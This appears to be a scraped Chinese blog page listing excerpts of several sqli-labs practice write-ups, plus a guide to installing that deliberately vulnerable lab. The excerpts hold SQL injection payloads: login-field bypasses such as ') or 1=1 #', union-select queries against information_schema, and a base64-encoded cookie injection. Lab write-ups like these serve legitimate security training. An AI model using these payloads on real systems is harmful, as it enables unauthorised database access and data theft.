Less-12 post传递参数 由于是post传参,我们先用burp-suite抓包,分析报文体,获取传参过程。 得到报文体之后使用hackbar插件中的post data进行注入实验 判断闭合方式: uname=’ or 1=1 #&passwd=&submit=Submit 登录失败 uname=") or 1=1 #&passwd=&submit=Submit 登录成功,在这里可以得知存在注入点,闭合方式为(“”) 使用order by判断字段列数: uname
sql注入】Less21-25a
lyy0xfff的博客
07-16 221
SQL注入PrefaceLess-21Less-22Less-23Less-25Less-25a Preface 由于前面20关我已经做完了,所以后面的个别关卡只提供一个思路或者如何绕过防御以及证明注入点存在即可,思路都是Less-1我们学的子查询语句 Less-21 0x00 由题目得知这是一道Cookie注入的题目,且cookie被编码成base64的编码格式。 什么是base64编码呢 Base64是网络上最常见的用于传输8Bit字节码的编码方式之一,Base64就是一种基于64个可打印字符来表示二进
sqli-labs-master前二十一到三十关过关总结
Alexz__的博客
02-13 1246
第二十一关: 通过抓包分析这里的cookie: 被base64加码算法加密了,懒得找闭合了直接看源码: 通过源码构造闭合,在某在线网站进行base64加密: JykgdW5pb24gc2VsZWN0IDEsMiwzICM= 直接爆出来显示位 ') union select 1,group_concat(schema_name),3 from ...
sql-lab(ALL 1-65)
lee_maple的博客
03-08 7711
less-1(基于错误的GET单引号字符型注入) id=1 //回显正常 id=1' //报错信息:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1 id=1' order by 4 # //用
Sql-lab全解
qq_59197927的博客
10-11 357
id=-1 union select null,null,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'--+group_concat()为输出格式 information_scheam这是个数据库中的表存放着数据库中各个表的信息。这里使用'")判断可能为数值型注入,也就不需要考虑闭合方式,回显大小为3位,位置后两位。
sql-labs(1-65)
Yb_140的博客
03-05 6114
目录 Less-1 Less-2 Less-3 Less-4 Less-5 Less-6 Less-7 Less-8 Less-9 Less-10 Less-11 Less-12 Less-13 Less-14 Less-15 Less-16 Less-17 Less-18 Less-19 Less-20 Less-21 Less-22 Less-23 Less-24 Less-25 Less-25a Less-26 Less-26a Less-2.
sqli-lab安装
09-05
要安装sqli-lab,您需要按照以下步骤进行操作: 1. 首先,确保您具有Web服务器环境。您可以使用Apache、Nginx或其他适合您的环境的Web服务器。 2. 下载sqli-lab的代码。您可以从GitHub存储库中获取它,链接:https://github.com/Audi-1/sqli-labs 。 3. 将下载的代码解压缩到您的Web服务器的根目录下。 4. 创建一个MySQL数据库,并导入提供的SQL文件。您可以在"sqli-labs/db-creds.inc"文件中找到数据库凭据。将该文件重命名为"db-creds.inc.php"并填写正确的数据库信息。 5. 现在,您应该能够通过访问"http://your-server-ip/sqli-labs/"来访问sqli-lab。 请注意,sqli-lab是一个用于学习和测试SQL注入漏洞的实验室环境。确保在安装和使用过程中采取适当的安全措施,不要将其用于非法目的。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值